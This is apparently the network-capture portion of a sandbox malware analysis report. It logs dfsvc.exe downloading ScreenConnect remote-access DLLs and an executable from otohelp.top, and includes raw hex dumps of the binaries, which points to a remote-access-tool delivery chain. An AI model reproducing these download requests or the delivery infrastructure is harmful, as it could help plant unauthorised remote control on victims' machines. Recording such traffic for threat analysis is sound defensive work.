2024-10-02 04:23:01 UTC	16384	IN	Data Raw: 6b 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 4f 70 65 6e 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6e 74 72 6f 6c 50 61 6e 65 6c 4d 65 73 73 61 67 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 43 6c 69 70 62 6f 61 72 64 4b 65 79 73 74 72 6f 6b 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 46 69 6c 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 52 65 63 65 69 76 Data Ascii: kMonitor.pngScreenConnect.Properties.CommandOpenMonitor.pngScreenConnect.Properties.ControlPanelMessages.pngScreenConnect.Properties.CommandSendClipboardKeystrokes.pngScreenConnect.Properties.CommandSendFiles.pngScreenConnect.Properties.CommandReceiv
2024-10-02 04:23:01 UTC	16384	IN	Data Raw: 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 3b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 20 00 3d 00 20 00 00 2b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 4d 00 75 00 74 00 65 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 31 53 00 65 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 56 00 6f 00 6c 00 75 00 6d 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 13 56 00 6f 00 6c 00 Data Ascii: ommand;SelectSoundCaptureModeCommand'SoundCaptureMode = +SelectSpeakersCommand'MuteSpeakersCommand1SetSpeakersVolumeCommandVol
2024-10-02 04:23:01 UTC	16384	IN	Data Raw: 72 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 43 6f 75 6e 74 13 57 61 73 4e 65 74 77 6f 72 6b 52 65 61 63 68 61 62 6c 65 13 57 61 73 48 61 6e 64 73 68 61 6b 65 53 74 61 72 74 65 64 15 57 61 73 48 61 6e 64 73 68 61 6b 65 43 6f 6d 70 6c 65 74 65 64 00 00 21 01 00 02 00 00 00 10 4d 65 74 72 69 63 73 45 6e 74 72 79 54 79 70 65 07 4d 69 6e 69 6d 75 6d 00 00 26 01 00 84 6b 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 4c 14 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 02 00 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 06 01 00 e4 00 00 00 06 01 00 48 00 00 00 06 01 00 49 00 00 00 06 Data Ascii: rtMillisecondCountWasNetworkReachableWasHandshakeStartedWasHandshakeCompleted!MetricsEntryTypeMinimum&kTAllowMultipleTInherited&LTAllowMultipleTInherited&TAllowMultipleTInheritedHI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49759	79.110.49.16	443	5812	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:23:02 UTC	95	OUT	GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip
2024-10-02 04:23:02 UTC	216	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 68096 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:23:02 GMT Connection: close
2024-10-02 04:23:02 UTC	16168	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 d8 54 90 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 02 01 00 00 06 00 00 00 00 00 00 ba 20 01 00 00 20 00 00 00 40 01 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 64 fa 01 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0T" 0 @ d@
2024-10-02 04:23:02 UTC	16384	IN	Data Raw: 00 00 0a 07 6f 11 00 00 0a 2d d0 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 7b 54 00 00 04 6f 24 02 00 0a 13 04 2b 5a 11 04 6f 25 02 00 0a 13 05 02 7b 53 00 00 04 7b 0d 00 00 04 11 05 73 26 02 00 0a 25 02 7b 52 00 00 04 28 f8 00 00 0a 7e 30 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 6d 00 00 06 73 06 02 00 0a 25 80 30 00 00 04 28 5f 00 00 2b 6f 27 02 00 0a 73 81 00 00 0a 6f 82 00 00 0a 11 04 6f 11 00 00 0a 2d 9d de 0c 11 04 2c 07 11 04 6f 10 00 00 0a dc 2a 01 1c 00 00 02 00 65 00 34 99 00 0a 00 00 00 00 02 00 b0 00 67 17 01 0c 00 00 00 00 1e 02 28 1d 00 00 0a 2a 56 02 7b 54 00 00 04 03 6f 23 02 00 0a 6f 28 02 00 0a 16 fe 01 2a 1e 02 28 1d 00 00 0a 2a 4a 02 7b 56 00 00 04 6f 29 02 00 0a 03 28 2a 02 00 0a 2a 1e 02 28 1d 00 00 0a 2a 00 00 00 13 30 03 00 43 00 00 Data Ascii: o-,o{To$+Zo%{S{s&%{R(~0%-&~+ms%0(_+o'soo-,oe4g(V{To#o((J{Vo)(*(0C
2024-10-02 04:23:02 UTC	16384	IN	Data Raw: 27 15 19 04 ae 2d 2d 15 19 04 cd 2e 37 15 b1 04 3c 27 3e 15 31 04 cb 31 78 09 29 04 e0 42 f6 00 e9 04 fe 42 56 15 f4 00 9b 18 81 02 31 04 a5 32 5c 15 f4 03 71 3a a1 00 fc 03 71 3a a1 00 19 04 ca 2d 85 15 11 03 71 3a 6a 04 09 03 5e 30 9e 15 d9 07 e5 35 a7 15 09 03 42 2c ad 15 e1 07 6b 29 06 00 19 03 5d 31 20 02 31 04 83 2d bd 15 29 04 84 31 6a 04 19 03 80 25 20 02 29 04 ad 25 6a 04 19 03 99 1b 20 02 29 04 c6 1b 6a 04 e1 07 61 29 06 00 21 03 f7 2e 20 02 d1 00 ea 49 c5 15 29 04 04 2f 6a 04 a9 04 31 3d b2 11 8c 03 8d 08 5a 04 e9 04 b2 49 bd 0a 04 04 f8 3e 46 00 8c 03 52 0b 5e 04 e9 04 cd 42 d8 15 31 04 e2 34 e0 15 29 04 e0 46 14 01 d1 01 9a 42 ef 15 5c 02 de 2c 63 00 09 02 e1 2e 14 01 69 02 c8 41 00 16 69 02 c3 17 14 01 29 05 7a 2d f6 00 59 03 d0 2d 06 16 a4 Data Ascii: '--.7<'>11x)BBV12\q:q:-q:j^05B,k)]1 1-)1j% )%j )ja)!. I)/j1=ZI>FR^B14)FB\,c.iAi)z-Y-
2024-10-02 04:23:02 UTC	16384	IN	Data Raw: 69 74 79 41 63 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 53 65 74 74 69 6e 67 73 50 72 6f 70 65 72 74 79 56 61 6c 75 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 47 72 6f 75 70 43 6f 6c 6c 65 63 74 69 6f 6e 00 57 61 69 74 69 6e 67 46 6f 72 43 6f 6e 6e 65 63 74 69 6f 6e 00 57 69 6e 33 32 45 78 63 65 70 74 69 6f 6e 00 43 72 79 70 74 6f 67 72 61 70 68 69 63 45 78 63 65 70 74 69 6f 6e 00 4e 6f 74 53 75 70 70 6f 72 74 65 64 45 78 63 65 70 74 69 6f 6e 00 54 72 61 63 65 45 78 63 65 70 74 69 6f 6e 00 45 6e 64 4f 66 53 74 72 65 61 6d 45 78 63 65 70 74 69 6f 6e 00 52 75 6e 57 69 74 68 43 72 61 73 68 4f 6e 45 78 63 65 70 74 69 6f 6e 00 54 72 79 53 75 62 73 63 72 69 62 65 54 6f 4c 6f 67 41 70 70 44 6f 6d 61 69 6e 45 78 63 65 70 74 69 6f 6e 00 49 6e Data Ascii: ityActionSystem.ReflectionSettingsPropertyValueCollectionGroupCollectionWaitingForConnectionWin32ExceptionCryptographicExceptionNotSupportedExceptionTraceExceptionEndOfStreamExceptionRunWithCrashOnExceptionTrySubscribeToLogAppDomainExceptionIn
2024-10-02 04:23:02 UTC	2776	IN	Data Raw: 00 08 01 00 00 08 00 00 00 00 05 01 00 01 00 00 05 01 00 02 00 00 0a 01 00 02 00 00 00 00 01 00 00 20 01 00 03 00 00 00 09 53 65 73 73 69 6f 6e 49 44 04 4e 61 6d 65 08 55 73 65 72 4e 61 6d 65 00 00 0d 01 00 05 00 00 00 00 00 00 00 01 00 00 2d 01 00 02 00 00 00 1c 43 72 65 64 65 6e 74 69 61 6c 50 72 6f 76 69 64 65 72 49 6e 73 74 61 6e 63 65 49 44 07 4d 65 73 73 61 67 65 00 00 0b 01 00 03 00 00 00 00 01 01 00 00 33 01 00 03 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 00 00 52 01 00 05 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 Data Ascii: SessionIDNameUserName-CredentialProviderInstanceIDMessage3ExecutablePathCommandLineParentProcessIDRExecutablePathCommandLineParentProcessIDExecutablePath

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49760	79.110.49.16	443	5812	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:23:03 UTC	89	OUT	GET /Bin/ScreenConnect.Windows.dll HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip
2024-10-02 04:23:03 UTC	218	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 1721856 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:23:03 GMT Connection: close
2024-10-02 04:23:03 UTC	16166	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c da d0 ab 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 3e 1a 00 00 06 00 00 00 00 00 00 82 5d 1a 00 00 20 00 00 00 60 1a 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 1a 00 00 02 00 00 5b ab 1a 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELl" 0>] ` [@
2024-10-02 04:23:03 UTC	16384	IN	Data Raw: 00 00 0a 14 04 05 16 28 ba 00 00 06 13 06 de 11 09 28 01 02 00 0a dc 06 2c 06 06 6f 11 00 00 0a dc 11 06 2a 00 00 01 34 00 00 02 00 99 00 0a a3 00 0c 00 00 00 00 02 00 81 00 2e af 00 0c 00 00 00 00 02 00 73 00 87 fa 00 07 00 00 00 00 02 00 06 00 fb 01 01 0a 00 00 00 00 13 30 02 00 1f 00 00 00 2a 00 00 11 1f 28 7e 5e 00 00 0a 28 e0 00 00 06 72 71 06 00 70 28 02 02 00 0a 0a 02 06 28 bd 00 00 06 2a 00 13 30 05 00 47 00 00 00 00 00 00 00 03 25 2d 06 26 28 be 00 00 06 18 8d d9 00 00 01 25 16 72 9d 06 00 70 a2 25 17 72 b9 06 00 70 a2 28 03 02 00 0a 7e a7 00 00 04 25 2d 13 26 14 fe 06 04 02 00 0a 73 05 02 00 0a 25 80 a7 00 00 04 02 28 32 00 00 2b 2a 00 1b 30 04 00 90 00 00 00 3a 00 00 11 28 0d 01 00 06 1f 0a 16 20 7c 4f 00 00 73 07 02 00 0a 28 6e 01 00 0a 2c 35 Data Ascii: ((,o4.s0(~^(rqp((0G%-&(%rp%rp(~%-&s%(2+0:( \|Os(n,5
2024-10-02 04:23:03 UTC	16384	IN	Data Raw: fc 00 00 04 7d f8 00 00 04 02 17 7d f7 00 00 04 17 2a 02 15 7d f7 00 00 04 02 02 7b fc 00 00 04 18 28 aa 01 00 06 7d fc 00 00 04 02 7b fc 00 00 04 16 d3 28 84 00 00 0a 2d c3 16 2a 1e 02 7b f8 00 00 04 2a 1a 73 7b 01 00 0a 7a 32 02 7b f8 00 00 04 8c ce 00 00 01 2a 00 00 13 30 02 00 3c 00 00 00 88 00 00 11 02 7b f7 00 00 04 1f fe 33 1d 02 7b f9 00 00 04 28 4e 03 00 0a 6f 4f 03 00 0a 33 0b 02 16 7d f7 00 00 04 02 0a 2b 07 16 73 4d 03 00 06 0a 06 02 7b fb 00 00 04 7d fa 00 00 04 06 2a 1e 02 28 53 03 00 06 2a 7a 02 28 2c 00 00 0a 02 03 7d fd 00 00 04 02 28 4e 03 00 0a 6f 4f 03 00 0a 7d ff 00 00 04 2a 06 2a 00 00 00 13 30 05 00 d5 00 00 00 89 00 00 11 02 7b fd 00 00 04 0a 06 2c 09 06 17 3b 8d 00 00 00 16 2a 02 15 7d fd 00 00 04 1f 09 0b 02 17 07 25 17 58 0b 1f Data Ascii: }}}{(}{(-{s{z2{0<{3{(NoO3}+sM{}(Sz(,}(NoO}*0{,;}%X
2024-10-02 04:23:03 UTC	16384	IN	Data Raw: 6e 22 06 00 71 cc 6e 22 06 00 48 cf 6e 22 06 00 5e 3e 6e 22 06 00 9f a3 6e 22 06 00 c4 b2 a0 02 06 00 36 b2 6e 22 06 00 49 a7 a0 02 06 00 41 a7 6e 22 06 00 81 cc 6e 22 06 00 af 54 6e 22 06 00 ba 90 6e 22 06 00 9f a3 6e 22 06 00 7c aa 6e 22 06 00 f7 cf 71 22 06 00 ce 45 71 22 06 00 66 46 6e 22 06 00 07 59 6e 22 06 00 b6 bf 6e 22 06 00 31 6a 6e 22 06 00 8f 9f 6e 22 06 00 e8 60 6e 22 06 00 48 cf 6e 22 06 00 f4 5f 6e 22 06 00 04 52 25 25 06 00 e3 be 6e 22 06 00 5b be 6e 22 06 10 55 51 f7 25 06 06 80 30 af 08 56 80 80 c8 fb 25 56 80 69 c8 fb 25 06 06 80 30 af 08 56 80 35 9d 00 26 06 06 80 30 af 08 56 80 62 27 05 26 56 80 90 29 05 26 56 80 e3 0d 05 26 56 80 86 29 05 26 06 06 80 30 6e 22 56 80 2c 39 0a 26 56 80 97 c8 0a 26 56 80 5f 39 0a 26 56 80 60 bd 0a 26 56 Data Ascii: n"qn"Hn"^>n"n"6n"IAn"n"Tn"n"n"\|n"q"Eq"fFn"Yn"n"1jn"n"`n"Hn"_n"R%%n"[n"UQ%0V%Vi%0V5&0Vb'&V)&V&V)&0n"V,9&V&V_9&V`&V
2024-10-02 04:23:03 UTC	16384	IN	Data Raw: c6 00 5e 53 10 00 0f 07 5e a5 00 00 00 00 91 18 18 99 0e 27 10 07 6a a5 00 00 00 00 86 18 ed 98 01 00 10 07 72 a5 00 00 00 00 83 00 d7 02 29 3b 10 07 7a a5 00 00 00 00 83 00 81 0a 30 3b 12 07 82 a5 00 00 00 00 86 18 ed 98 01 00 13 07 8a a5 00 00 00 00 83 00 d6 07 1b 3b 13 07 9d a5 00 00 00 00 91 18 18 99 0e 27 14 07 a9 a5 00 00 00 00 86 18 ed 98 01 00 14 07 b1 a5 00 00 00 00 83 00 ab 02 39 3b 14 07 b9 a5 00 00 00 00 83 00 55 0a 39 3b 15 07 c1 a5 00 00 00 00 86 18 ed 98 05 00 16 07 e0 a5 00 00 00 00 e1 01 ac 58 01 00 17 07 18 a6 00 00 00 00 e1 01 37 c2 3d 00 17 07 e4 a7 00 00 00 00 81 00 d5 0d 01 00 17 07 00 a8 00 00 00 00 e1 09 d0 bb e0 18 17 07 08 a8 00 00 00 00 e1 01 13 b6 01 00 17 07 0f a8 00 00 00 00 e1 09 96 bc 4e 00 17 07 18 a8 00 00 00 00 e1 01 bd Data Ascii: ^S^'jr);z0;;'9;U9;X7=N
2024-10-02 04:23:03 UTC	16384	IN	Data Raw: 5b 34 45 10 a9 06 0b 5f 39 02 3c 04 8d 4a a0 02 91 04 5f 46 01 00 89 06 8d 58 39 02 d1 03 86 c7 01 00 69 04 a6 58 01 00 71 09 dc 37 b1 1a 71 09 1c 36 89 01 59 06 ab cc e9 1a e1 02 ed 98 f8 1a e1 02 ed 98 07 1b 41 06 ed 98 10 00 b9 08 ae 9e 16 1b 19 0a 85 3e 1d 1b 29 02 96 4c 7c 04 31 02 ed 98 01 00 99 04 68 53 f5 09 c1 09 21 5b 10 00 39 02 96 4c 7c 04 39 02 35 70 89 01 99 02 e2 6a 7c 04 99 02 28 59 3b 1b b1 07 1b 6b 3d 0b 4c 04 a8 98 5b 00 54 04 b5 bc 49 00 44 02 ab 0d d9 00 08 00 14 00 25 1c 08 00 18 00 2a 1c 08 00 1c 00 2f 1c 08 00 20 00 34 1c 08 00 b8 00 39 1c 0e 00 bc 00 3e 1c 0e 00 c0 00 51 1c 0e 00 c4 00 62 1c 08 00 c8 00 75 1c 08 00 cc 00 7a 1c 0e 00 d0 00 7f 1c 0e 00 d4 00 8e 1c 0e 00 d8 00 9d 1c 0e 00 e0 00 c6 1c 08 00 f0 00 64 1d 08 00 f4 00 69 Data Ascii: [4E_9<J_FX9iXq7q6YA>)L\|1hS![9L\|95pj\|(Y;k=L[TID%*/ 49>Qbuzdi
2024-10-02 04:23:03 UTC	16384	IN	Data Raw: 3e 39 5f 5f 31 33 35 5f 31 00 3c 47 65 74 46 75 6c 6c 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 3e 62 5f 5f 31 33 35 5f 31 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 34 37 5f 31 00 3c 43 6f 6e 6e 65 63 74 53 65 72 76 65 72 43 6c 69 65 6e 74 4e 61 6d 65 64 50 69 70 65 73 3e 67 5f 5f 57 61 69 74 41 6e 64 43 6f 6e 6e 65 63 74 4e 61 6d 65 64 50 69 70 65 7c 39 37 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 37 5f 31 00 3c 3e 39 5f 5f 38 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 38 5f 31 00 3c 3e 39 5f 5f 32 39 5f 31 00 3c 54 72 79 47 65 74 41 63 74 69 76 65 43 6f 6e 73 6f 6c 65 53 65 73 73 69 6f 6e 49 44 3e 62 5f 5f Data Ascii: >9__135_1<GetFullExecutablePath>b__135_1<>c__DisplayClass47_1<ConnectServerClientNamedPipes>g__WaitAndConnectNamedPipe\|97_1<PopulateContextMenuStripItems>b__7_1<>9__8_1<PopulateContextMenuStripItems>b__8_1<>9__29_1<TryGetActiveConsoleSessionID>b__
2024-10-02 04:23:03 UTC	16384	IN	Data Raw: 62 61 73 65 4b 65 79 48 61 6e 64 6c 65 00 6c 69 62 72 61 72 79 48 61 6e 64 6c 65 00 72 65 73 75 6d 65 5f 68 61 6e 64 6c 65 00 54 6f 52 65 63 74 61 6e 67 6c 65 00 47 65 74 43 6c 69 65 6e 74 52 65 63 74 61 6e 67 6c 65 00 47 65 74 57 69 6e 64 6f 77 52 65 63 74 61 6e 67 6c 65 00 72 65 63 74 61 6e 67 6c 65 00 70 44 61 74 61 46 69 6c 65 00 75 6c 6c 54 6f 74 61 6c 50 61 67 65 46 69 6c 65 00 75 6c 6c 41 76 61 69 6c 50 61 67 65 46 69 6c 65 00 43 72 65 61 74 65 46 69 6c 65 00 68 54 65 6d 70 6c 61 74 65 46 69 6c 65 00 44 65 6c 65 74 65 46 69 6c 65 00 4d 6f 76 65 46 69 6c 65 00 70 43 6f 6e 66 69 67 46 69 6c 65 00 54 72 79 55 6e 62 6c 6f 63 6b 46 69 6c 65 00 4c 6f 61 64 52 65 73 6f 75 72 63 65 50 61 63 6b 46 72 6f 6d 46 69 6c 65 00 4d 61 70 46 69 6c 65 00 70 48 65 6c Data Ascii: baseKeyHandlelibraryHandleresume_handleToRectangleGetClientRectangleGetWindowRectanglerectanglepDataFileullTotalPageFileullAvailPageFileCreateFilehTemplateFileDeleteFileMoveFilepConfigFileTryUnblockFileLoadResourcePackFromFileMapFilepHel
2024-10-02 04:23:03 UTC	16384	IN	Data Raw: 70 00 3c 39 3e 5f 5f 43 6c 6f 73 65 44 65 73 6b 74 6f 70 00 43 72 65 61 74 65 44 65 73 6b 74 6f 70 00 53 77 69 74 63 68 44 65 73 6b 74 6f 70 00 4f 70 65 6e 44 65 73 6b 74 6f 70 00 6c 70 44 65 73 6b 74 6f 70 00 54 72 79 45 6e 73 75 72 65 54 68 72 65 61 64 4f 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 4f 70 65 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 6c 70 73 7a 44 65 73 6b 74 6f 70 00 64 65 73 6b 74 6f 70 00 65 5f 73 70 00 55 72 69 53 63 68 65 6d 65 48 74 74 70 00 4e 61 74 69 76 65 43 6c 65 61 6e 75 70 00 6c 70 4c 6f 61 64 4f 72 64 65 72 47 72 6f 75 70 00 47 65 74 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 41 70 70 44 6f 6d 61 69 6e 53 65 74 75 70 00 70 73 7a 56 65 6e 64 6f 72 53 65 74 75 70 00 66 43 6f 6e 74 65 78 74 52 65 71 00 53 79 73 74 65 6d 2e Data Ascii: p<9>__CloseDesktopCreateDesktopSwitchDesktopOpenDesktoplpDesktopTryEnsureThreadOnInputDesktopOpenInputDesktoplpszDesktopdesktope_spUriSchemeHttpNativeCleanuplpLoadOrderGroupGetLastActivePopupAppDomainSetuppszVendorSetupfContextReqSystem.
2024-10-02 04:23:03 UTC	16384	IN	Data Raw: 00 4f 70 65 6e 52 65 67 69 73 74 72 79 4b 65 79 00 43 72 65 61 74 65 50 72 6f 70 65 72 74 79 4b 65 79 00 47 65 74 48 6f 74 6b 65 79 00 53 65 74 48 6f 74 6b 65 79 00 70 77 48 6f 74 6b 65 79 00 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 00 67 65 74 5f 41 73 73 65 6d 62 6c 79 00 67 65 74 5f 46 6f 6e 74 46 61 6d 69 6c 79 00 44 65 66 61 75 6c 74 46 6f 6e 74 46 61 6d 69 6c 79 00 54 72 79 44 69 73 61 62 6c 65 46 69 6c 65 53 79 73 74 65 6d 52 65 64 69 72 65 63 74 69 6f 6e 54 65 6d 70 6f 72 61 72 69 6c 79 00 73 65 74 5f 52 65 61 64 4f 6e 6c 79 00 44 69 73 70 6f 73 65 51 75 69 65 74 6c 79 00 70 6f 69 6e 74 6c 79 00 53 65 6c 65 63 74 4d 61 6e 79 00 53 68 75 74 64 6f 77 6e 42 6c 6f 63 6b 52 65 61 73 6f 6e 44 65 73 74 72 6f 79 Data Ascii: OpenRegistryKeyCreatePropertyKeyGetHotkeySetHotkeypwHotkeySystem.Security.Cryptographyget_Assemblyget_FontFamilyDefaultFontFamilyTryDisableFileSystemRedirectionTemporarilyset_ReadOnlyDisposeQuietlypointlySelectManyShutdownBlockReasonDestroy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49762	79.110.49.16	443	5812	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:23:05 UTC	95	OUT	GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip
2024-10-02 04:23:05 UTC	217	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 601376 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:23:05 GMT Connection: close
2024-10-02 04:23:05 UTC	16167	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7b 3c 99 98 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 fc 08 00 00 06 00 00 00 00 00 00 92 15 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 19 78 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL{<"0 @ `x@
2024-10-02 04:23:05 UTC	16384	IN	Data Raw: 00 0a 2a 00 00 1b 30 06 00 ef 0d 00 00 2c 00 00 11 73 ab 07 00 06 0a 06 02 7d 14 03 00 04 28 75 01 00 0a 2c 1c 72 9d 0a 00 70 17 17 28 76 01 00 0a 28 77 01 00 0a 16 8d 11 00 00 01 28 78 01 00 0a 02 17 7d 48 00 00 04 02 28 e4 00 00 06 17 28 cf 01 00 0a 0b 02 28 fd 00 00 06 0c 02 28 dc 00 00 06 7e a9 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 25 07 00 06 73 d0 01 00 0a 25 80 a9 02 00 04 28 33 00 00 2b 6f d1 01 00 0a 0d 38 24 0c 00 00 12 04 09 6f d2 01 00 0a 7d 16 03 00 04 11 04 7b 16 03 00 04 28 2c 00 00 2b 13 05 11 04 7b 16 03 00 04 6f 15 03 00 06 28 36 06 00 06 13 06 11 04 7b 16 03 00 04 6f 29 03 00 06 28 4a 06 00 06 13 07 11 04 7b 16 03 00 04 6f 2a 03 00 06 28 4a 06 00 06 13 08 11 04 7b 16 03 00 04 6f 15 03 00 06 02 28 fb 00 00 06 25 13 0e 6f a2 00 00 0a Data Ascii: 0,s}(u,rp(v(w(x}H((((~%-&~%s%(3+o8$o}{(,+{o(6{o)(J{o(J{o(%o
